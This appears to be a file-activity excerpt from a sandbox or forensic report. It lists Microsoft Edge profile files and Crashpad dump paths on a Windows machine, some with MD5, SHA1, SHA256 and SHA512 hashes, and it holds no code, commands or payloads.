C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Favicons
| MD5 | 71c47b8f44867d805fed290fb0a18f74 |
| SHA1 | a019b3329dd49f91ea94267f19de580c40c6ef67 |
| SHA256 | 13daa8fe29d46fda8acd97cacd7baecc700b2a8763538709f8282941b629865c |
| SHA512 | f35b779a06ef83496eb5adcd1ffeb20c144cc78ced2d923c5f87f9b9220b23c31a712b7518f691b58f65422a28b48ad569a43ee23936fa6445a9d8251a9658c7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Visited Links
| MD5 | 9109e330e97a971971eabc51e139e2a5 |
| SHA1 | 1784be19cb2001025503165d0ca336eb3ed1d21a |
| SHA256 | ec4fd5c50d2dab041a5e89bc4194f4adb3805cdcef8f3b6deb3e97e693b14957 |
| SHA512 | 07af0a7d45ae1d0b828a29e4624f559ae65843e7c02a4ae4a83b20c9ec6783cf5ab2e51f15808dcc0da3e1ad60b0699e1b410f0a55b6ddaf0d8e2fa05e8fb5ea |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Site Characteristics Database\LOG
| MD5 | b2f6ddf5a9c8144d3eaa5718eeac56fe |
| SHA1 | 374b570d8e9ccab570788712a5d09ca6145b8616 |
| SHA256 | a285c90649277e792af2b94fd75687e9d02bee3a0cb65ca9407b20c2e8a68f79 |
| SHA512 | a12a0f8a8b0053f2f5c4f31972535b638ccfb029bbce910921a632dfcef3ee73d2aa7bb6f444ebe3977c8cc27230a26f0c4840223f12f48a1803dbb29d838b28 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Site Characteristics Database\LOG.old
| MD5 | 7944ac4f945d91bf5d61e69475b18e4c |
| SHA1 | 81da808a01aaeb8144895b6ee9aac4359a27bc33 |
| SHA256 | e85b177c16c1ffee3747d60ff85ee1e57e1946f02796aa24e22944e2433e643b |
| SHA512 | 0af1141379fa833cc9dd58d6bf7f7f7664380688b0ff471a45ae020a92b41d4db270c0d847731a7fa872d03f23195aa5479c65f0b6e151a57dda537ac62c76b4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 8744fb59ea71b0a9603412deb911617a |
| SHA1 | 871f6a6a2ac14e5ce8cf9488495d052aca157e30 |
| SHA256 | 2e971f0e8e5fc83611c30d3e1fd28a7a3b92cc87372670f3233609f1236ee293 |
| SHA512 | 6d033ad15270bb08322d6c7efc594aeb1caf580290acce98f98b13637255ce5cfd945dde5aea4abdcf62d1d035cdf14947bcd02ceb71a35afc9dd381b79bfdf5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Code Cache\js\index
| MD5 | 54cb446f628b2ea4a5bce5769910512e |
| SHA1 | c27ca848427fe87f5cf4d0e0e3cd57151b0d820d |
| SHA256 | fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d |
| SHA512 | 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\History
| MD5 | 9618e15b04a4ddb39ed6c496575f6f95 |
| SHA1 | 1c28f8750e5555776b3c80b187c5d15a443a7412 |
| SHA256 | a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab |
| SHA512 | f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Sync Data\LevelDB\LOG
| MD5 | a9a64bc193520c3c58f8f18654ae0570 |
| SHA1 | 3bc0a66068838b3162752eeed9dc88d64dd72cc6 |
| SHA256 | 828d60475300c86f91cf31d815ac64109d6d41eea1968f842cde3f0918e1ceb5 |
| SHA512 | 827f6c104ec95e21fb630fcc338f96bef4f800bcb3919de300b3495e1908f661abc37fc3453108180b426fb9e299bece8faa40367cb9edc23d355303fc963072 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Sync Data\LevelDB\LOG.old
| MD5 | fc721d46610716d6035eebc1ec5339e8 |
| SHA1 | 5fb55b017a44d9e3a43b2c36d34628de053c6f3d |
| SHA256 | 18812c1340dbf604777237f6022008e60e3b65aa1f1686d43a9d75a83a56a8fd |
| SHA512 | 8e79d120afea8d958d10c611742d73b40ebb0dfd77aac6617de5420117f33a993133ca76a0e89c40670163e40d71dad100029e692db26188b497923ed06af73b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Preferences
| MD5 | c5740e2cdce08e815b0fa146576b117a |
| SHA1 | cd50fba2d6f8535471a4a08841967b8cd9d64c65 |
| SHA256 | 08431aa71de8c862b4744bdddbf6a2505b2705a4589e82c482f606a26fc478fd |
| SHA512 | 873e93a005b5603a4a421522bce344b9dabc785f631912bf981e34695a0cf2195cc135811e4064bebcf954a01a4984706bf3d000d3f072fba322fe4a815129d4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\SmartScreen\local\warnStateCache
| MD5 | 3f66f244278461dd07a3feb77a17712f |
| SHA1 | 8d570b550699ad0f248ec98b5d678f54248c0a84 |
| SHA256 | 203ce5c7c1680c6e98f5ceca920e9d904122a9e26a743191e9b0fe1f6584ed60 |
| SHA512 | 8d4733222e2e0bbc18370055d0602d0389e7a562887e97b2e54073017ffea024e9b1341ed95e28883861ef5e0d4fa9d27ed0894912ffe167632aed2e4cf53e7d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\SmartScreen\local\download_cache
| MD5 | 24127606dac5cc6142848b0387a3afb6 |
| SHA1 | 2dd825cba2ded5f73de2f70d3056764788d6b3cd |
| SHA256 | 7680b8117dce679eaf37a1c4670506fda78781cfcd994295b5108db18fbbc3a8 |
| SHA512 | 0c37b62b580255716371554cd47a1d7aa15a92b5376ff66d42cacf1e2fd95c027e7f8781231c4b0d9ccc17521a94f1e719cfd2307853d6d7d72dd8155ba6868b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\History Provider Cache
| MD5 | a9851aa4c3c8af2d1bd8834201b2ba51 |
| SHA1 | fa95986f7ebfac4aab3b261d3ed0a21b142e91fc |
| SHA256 | e708be5e34097c8b4b6ecb50ead7705843d0dc4b0779b95ef57073d80f36c191 |
| SHA512 | 41a1b4d650ff55b164f3db02c8440f044c4ec31d8ddbbbf56195d4e27473c6b1379dfad3581e16429650e2364791f5c19aae723efc11986bb986ef262538b818 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Local Storage\leveldb\LOG
| MD5 | a6041aabb50c61d0184525eb6e857854 |
| SHA1 | 8cb3c553d5295cc88231a84a53efa8a9cd4ffb33 |
| SHA256 | 13310a17a50eae1f5601edb9182029d4f848920e8bce3c15116d079865be941e |
| SHA512 | ce6b561082104fb812dd7b791316682d70fce31c50432172b985f2ddcd41fbadd494b22868e8c5d13184c305f89adf535a58e73cac9600823436a7c4ea924119 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Local Storage\leveldb\LOG.old
| MD5 | d4039b185bc58feb09012f5ea6763ea6 |
| SHA1 | 98b150d7b4964d087dccdce53b3cfd493e76c3bd |
| SHA256 | 16cdd538c97ac7d0c9a1f7731b672705f50399b09e7c03997d8db28fc00eaf25 |
| SHA512 | 75c9c311b63103bf315ef3417e15c3bb3250078920f3bb3097612cda08a888f9ee6675d9552f3a42417e6fc8ad4f85dc8fc70b9b6b47350007cadd436c4fc23a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Top Sites
| MD5 | f44dc73f9788d3313e3e25140002587c |
| SHA1 | 5aec4edc356bc673cba64ff31148b934a41d44c4 |
| SHA256 | 2002c1e5693dd638d840bb9fb04d765482d06ba3106623ce90f6e8e42067a983 |
| SHA512 | e556e3c32c0bc142b08e5c479bf31b6101c9200896dd7fcd74fdd39b2daeac8f6dc9ba4f09f3c6715998015af7317211082d9c811e5f9e32493c9ecd888875d7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\load_statistics.db
| MD5 | 3321b02bc024fb5a6cd075375fbd8d03 |
| SHA1 | d6c82e943be01e8a3f558700f37ef0b4b2c6a97a |
| SHA256 | 1efcdd2c69107b34cf8636a3172323e4e879fcfaff009a000199423d9d9e3b45 |
| SHA512 | e052fb05e10b66f220b125b6352abe9afb0da6a1e90b9b18420d69ae3f7e38c1a261876330d8c8fe163c625881a59bf24123fcfb101ea540b6ecef1a7b16356d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\GPUCache\index
| MD5 | bdfb72631c3fc3f374d1606571688a74 |
| SHA1 | a3e6b8ada17f07d9e931eac1dbb1c574af5d1e0e |
| SHA256 | 40b064cf10a5f6bb65391d7cded1a4aa136d1bf6c7f92248448e214d0dd32880 |
| SHA512 | ed4d2fc5b8d38e181b1859e5655686e1adbfc6c5b9f5f1a9c890c44f4194fc4d66751bce598a698a4c293443b40d13cb2eb02c01096437f30166ab04c53bbf29 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\GPUCache\data_3
| MD5 | 41876349cb12d6db992f1309f22df3f0 |
| SHA1 | 5cf26b3420fc0302cd0a71e8d029739b8765be27 |
| SHA256 | e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c |
| SHA512 | e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\GPUCache\data_2
| MD5 | 0962291d6d367570bee5454721c17e11 |
| SHA1 | 59d10a893ef321a706a9255176761366115bedcb |
| SHA256 | ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7 |
| SHA512 | f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\GPUCache\data_1
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\GPUCache\data_0
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\shared_proto_db\metadata\LOG
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\shared_proto_db\LOG
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Session Storage\LOG
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\shared_proto_db\metadata\000003.log
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Preferences
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\data_reduction_proxy_leveldb\CURRENT
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\17ef7bc2-fdbe-42b6-95d5-7488ca6d88d2.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\metadata
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\b26ad9aa-3214-4a47-8290-0b3a03d52f43.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\b7b5412c-0f31-4f68-b8d8-117c5a64cb06.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\17c5331c-04e1-4394-bcf1-bc0f645a3a55.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\f2cad9a3-2f78-4692-bc1a-dccc604ddfcc.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\31db489b-e828-4397-823c-0d0102b33cef.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\87f82129-5ead-48a2-b0e3-8ea1b8d6f770.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Preferences
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\15bd52b7-d6ad-41f4-84b4-68f51e4ca23c.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\2e768fa3-656f-4694-9c33-65a719f69bc5.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\25b62285-fbe9-4e7e-b851-72c00e743c76.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\6885d9c7-2b7b-4d95-971b-ff6b17628fbf.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\fcaf00fe-f577-43fd-81a0-1bd29d290296.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\8bd30271-72d7-482b-87e5-9f5d415996d2.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\metadata
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\609fd34d-2446-458d-8410-fd29da304fc7.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\ed947f9c-5427-4219-b738-d5bb49f6fa2c.tmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Preferences
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\89ad4e69-7639-498e-8873-bb36789ace18.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\003464b0-e142-422d-a6c4-ebff6e932fd9.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\380fc30e-40e8-4f31-829b-902113d51c4b.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\metadata
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\1aec9ba8-e99d-401d-9856-7a7139bc0c78.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\c4ac5f02-301c-43e3-b8aa-358f9927c2ae.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\metadata
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\292d474a-9377-497a-b1c1-10b25edddadc.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\metadata
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\f3afa200-2d28-4dd8-aa41-4893f6971d8a.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\metadata
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\7706fb13-207f-4d70-b6fa-25e1450a5d12.dmp